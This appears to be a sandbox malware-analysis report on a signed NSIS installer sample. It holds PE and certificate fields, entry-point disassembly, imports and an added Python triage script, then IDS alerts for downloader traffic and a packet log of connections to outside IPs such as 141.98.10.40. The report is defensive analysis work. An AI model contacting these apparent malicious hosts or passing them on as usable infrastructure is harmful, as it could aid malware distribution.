                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x51E3058B [Sun Jul 14 20:09:47 2013 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:17b7d61bda0f7478e36d9ce3d4170680
                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=fosterstilling, O=fosterstilling, L=Jackson, C=US
                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487 (HRESULT 0x800B0109, CERT_E_UNTRUSTEDROOT: the issuer and subject DNs are identical, so the chain ends in a self-signed certificate that is not in the trust store)
Not Before:23/02/2024 05:00:37
Not After:22/02/2027 05:00:37
                                                                            Subject Chain
                                                                            • CN=fosterstilling, O=fosterstilling, L=Jackson, C=US
                                                                            Version:3
                                                                            Thumbprint MD5:F01335F1BBCDDA054CFC73801B801AC7
                                                                            Thumbprint SHA-1:20489A372C20054E55FCD8D377FB5209E1B97F81
                                                                            Thumbprint SHA-256:79CCAB53CAE0477AF1C90C8B1B7BE5CC3A75B0A30AD5E35682FF4D51A262FD7E
                                                                            Serial:08E03876D97903A4BA903A213932262ED8F9D0D3
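A few of the static fields above are worth decoding together: the PE timestamp (0x51E3058B) resolves to July 2013, more than ten years before the signing certificate's Not Before date, which is consistent with a prebuilt NSIS stub rather than a freshly compiled binary; the signature error is the CERT_E_UNTRUSTEDROOT HRESULT; and the IMAGE_DIRECTORY_ENTRY_SECURITY entry listed further down (offset 0xa4cc8, size 0x918) ends exactly at the 677'344-byte file size, i.e. the Authenticode blob is appended as the file's tail. The block below is an added example, not Joe Sandbox code; every constant is copied from this report, and TRUST_ERRORS is a short excerpt of the Windows certificate-trust error codes.

```python
"""Decode the static PE and Authenticode fields shown in the report.

Added example, not Joe Sandbox code. The constants are the report's own values;
TRUST_ERRORS is a small excerpt of the Windows certificate-trust HRESULTs.
"""
from datetime import datetime, timezone

FILE_SIZE = 677_344                       # "File size"
TIME_DATE_STAMP = 0x51E3058B              # "Time Stamp" (IMAGE_FILE_HEADER.TimeDateStamp)
SECURITY_DIR_OFFSET = 0xA4CC8             # IMAGE_DIRECTORY_ENTRY_SECURITY: a raw file offset
SECURITY_DIR_SIZE = 0x918
SIGNATURE_ERROR = -2146762487             # "Error Number" from the signature block
SUBJECT = "CN=fosterstilling, O=fosterstilling, L=Jackson, C=US"
ISSUER = "CN=fosterstilling, O=fosterstilling, L=Jackson, C=US"
CERT_NOT_BEFORE = datetime(2024, 2, 23, 5, 0, 37, tzinfo=timezone.utc)
CERT_NOT_AFTER = datetime(2027, 2, 22, 5, 0, 37, tzinfo=timezone.utc)

# Excerpt of winerror.h trust/certificate codes (FACILITY_CERT = 0x0B)
TRUST_ERRORS = {
    0x800B0100: "TRUST_E_NOSIGNATURE",
    0x800B0101: "CERT_E_EXPIRED",
    0x800B0109: "CERT_E_UNTRUSTEDROOT",
    0x800B010A: "CERT_E_CHAINING",
    0x80096010: "TRUST_E_BAD_DIGEST",
}


def pe_timestamp(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch, always UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def hresult_name(signed: int):
    """Map the signed 32-bit error WinVerifyTrust reports to (HRESULT, symbolic name)."""
    code = signed & 0xFFFFFFFF
    return code, TRUST_ERRORS.get(code, "unknown")


def signature_is_file_tail(offset: int, size: int, file_size: int) -> bool:
    """True when the WIN_CERTIFICATE blob is the last thing in the file.

    The security directory holds a file offset, not an RVA, and its size is
    8-byte aligned; anything after it would not be covered by the signature.
    """
    return offset + size == file_size and size % 8 == 0


def triage() -> dict:
    stamp = pe_timestamp(TIME_DATE_STAMP)
    code, name = hresult_name(SIGNATURE_ERROR)
    return {
        "compile_time_utc": stamp.strftime("%Y-%m-%d %H:%M:%S"),
        "stamp_to_cert_days": (CERT_NOT_BEFORE - stamp).days,
        "hresult": f"0x{code:08X}",
        "hresult_name": name,
        "self_signed": SUBJECT == ISSUER,
        "cert_valid_days": (CERT_NOT_AFTER - CERT_NOT_BEFORE).days,
        "signature_at_file_tail": signature_is_file_tail(
            SECURITY_DIR_OFFSET, SECURITY_DIR_SIZE, FILE_SIZE),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

A self-signed certificate gives the sample a "Digitally signed: true" line while verifying to CERT_E_UNTRUSTEDROOT on any host that has not imported it; allow-listing rules that key on the presence of a signature rather than on a trusted chain would treat this file as signed.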
                                                                            Instruction
                                                                            sub esp, 000002D4h
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            push edi
                                                                            push 00000020h
                                                                            xor ebp, ebp
                                                                            pop esi
                                                                            mov dword ptr [esp+14h], ebp
                                                                            mov dword ptr [esp+10h], 00409230h
                                                                            mov dword ptr [esp+1Ch], ebp
                                                                            call dword ptr [00407034h]
                                                                            push 00008001h
                                                                            call dword ptr [004070BCh]
                                                                            push ebp
                                                                            call dword ptr [004072ACh]
                                                                            push 00000008h
                                                                            mov dword ptr [00429298h], eax
                                                                            call 00007F3FDCE0EC42h
                                                                            mov dword ptr [004291E4h], eax
                                                                            push ebp
                                                                            lea eax, dword ptr [esp+34h]
                                                                            push 000002B4h
                                                                            push eax
                                                                            push ebp
                                                                            push 00420690h
                                                                            call dword ptr [0040717Ch]
                                                                            push 0040937Ch
                                                                            push 004281E0h
                                                                            call 00007F3FDCE0E8ADh
                                                                            call dword ptr [00407134h]
                                                                            mov ebx, 00434000h
                                                                            push eax
                                                                            push ebx
                                                                            call 00007F3FDCE0E89Bh
                                                                            push ebp
                                                                            call dword ptr [0040710Ch]
                                                                            cmp word ptr [00434000h], 0022h
                                                                            mov dword ptr [004291E0h], eax
                                                                            mov eax, ebx
                                                                            jne 00007F3FDCE0BD9Ah
                                                                            push 00000022h
                                                                            mov eax, 00434002h
                                                                            pop esi
                                                                            push esi
                                                                            push eax
                                                                            call 00007F3FDCE0E309h
                                                                            push eax
                                                                            call dword ptr [00407240h]
                                                                            mov dword ptr [esp+18h], eax
                                                                            jmp 00007F3FDCE0BE5Eh
                                                                            push 00000020h
                                                                            pop edx
                                                                            cmp cx, dx
                                                                            jne 00007F3FDCE0BD99h
                                                                            inc eax
                                                                            inc eax
                                                                            cmp word ptr [eax], dx
                                                                            je 00007F3FDCE0BD8Bh
                                                                            add word ptr [eax], 0000h
                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804
Name                                 Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT         0x7494           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       0x6d000          0x271f8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY       0xa4cc8          0x918         (none; this entry is a raw file offset, not an RVA: 0xa4cc8 + 0x918 = 0xa55e0 = 677'344, the end of the file)
IMAGE_DIRECTORY_ENTRY_BASERELOC      0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG          0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS            0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT            0x7000           0x2b8         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED       0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x5e20        0x6000    dd493ae9ebfb948f2a612edd72200a78  False     0.6545003255208334   data       6.407301589030798   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x1354        0x1400    8a134e15423272c853e24b49bfc8707f  False     0.43046875           data       5.037834422880877   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x202d8       0x600     baf389fb3ef48369d3c1f90021fcff8b  False     0.4733072916666667   data       3.7606720362000137  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2a000          0x43000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x6d000          0x271f8       0x27200   1d37c42d5ee68a600bda4509cd11f047  False     0.49120781749201275  data       5.995617174533498   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6d2f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/m | English | United States | 0.19167751094286054
RT_ICON | 0x7db20 | 0xe059 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9314853829679801
RT_ICON | 0x8bb80 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/m | English | United States | 0.269189891355692
RT_ICON | 0x8fda8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/m | English | United States | 0.29688796680497925
RT_ICON | 0x92350 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/m | English | United States | 0.3599906191369606
RT_ICON | 0x933f8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/m | English | United States | 0.5186170212765957
RT_DIALOG | 0x93860 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x93960 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x93a80 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x93b48 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x93ba8 | 0x5a | data | English | United States | 0.7666666666666667
RT_VERSION | 0x93c08 | 0x2e4 | data | English | United States | 0.4418918918918919
RT_MANIFEST | 0x93ef0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-04T07:13:21.664986+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49704 | TCP
2024-11-04T07:13:37.121948+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49787 | 141.98.10.40 | 80 | TCP
2024-11-04T07:13:40.417427+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | TCP
2024-11-04T07:13:41.823378+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | TCP
2024-11-04T07:13:42.525588+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49819 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:43.417133+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49825 | 193.122.6.168 | 80 | TCP
2024-11-04T07:13:44.137122+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49829 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:49.154916+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49864 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:52.375517+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49887 | 188.114.96.3 | 443 | TCP
2024-11-04T07:14:01.197295+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49932 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 4, 2024 07:13:37.853023052 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853271008 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853296041 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853305101 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853317022 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853324890 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853338957 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853652954 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853663921 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853672981 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853683949 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853699923 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853727102 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.857064009 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.857081890 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.857130051 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.913783073 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.913794994 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.913836956 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971159935 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971179962 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971190929 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971215010 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971230030 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971307039 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971344948 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971364975 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971497059 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971508980 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971518993 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971534014 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971558094 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971806049 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971816063 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971827030 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971849918 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971859932 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.972189903 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972201109 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972210884 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972223043 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972234011 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972237110 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.972255945 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.972276926 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.975518942 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.975557089 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.975565910 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.975593090 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.032828093 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.032849073 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.032882929 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.032895088 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.089811087 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089828014 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089838982 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089850903 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089863062 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089898109 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.089929104 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090086937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090107918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090143919 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090276003 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090287924 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090297937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090312958 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090339899 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090507984 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090517044 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090550900 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090725899 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090742111 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090751886 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090761900 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090766907 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090774059 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090790033 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090817928 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.135394096 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.135431051 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.135488033 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.208703995 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208725929 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208736897 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208753109 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208766937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208779097 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208784103 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.208791971 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208801985 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208831072 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.208848953 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209142923 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209152937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209163904 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209173918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209184885 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209196091 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209223986 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209661007 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209671974 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209681988 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209707022 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209717035 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.253768921 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253822088 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253834963 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253881931 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253881931 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.253892899 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253923893 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.253935099 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327203989 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327255964 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327306032 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327320099 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327332973 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327342987 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327353954 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327368975 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327383041 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327754974 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327765942 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327778101 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327790022 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327795029 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327820063 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328208923 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328219891 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328231096 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328242064 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328253031 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328253984 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328265905 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328294992 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328731060 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328739882 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328773022 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.372359991 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372371912 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372412920 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.372442961 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372457981 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372471094 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372482061 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372498989 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.372519970 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.445864916 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.445887089 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.445897102 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.445930004 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.445959091 CET4978780192.168.2.5141.98.10.40
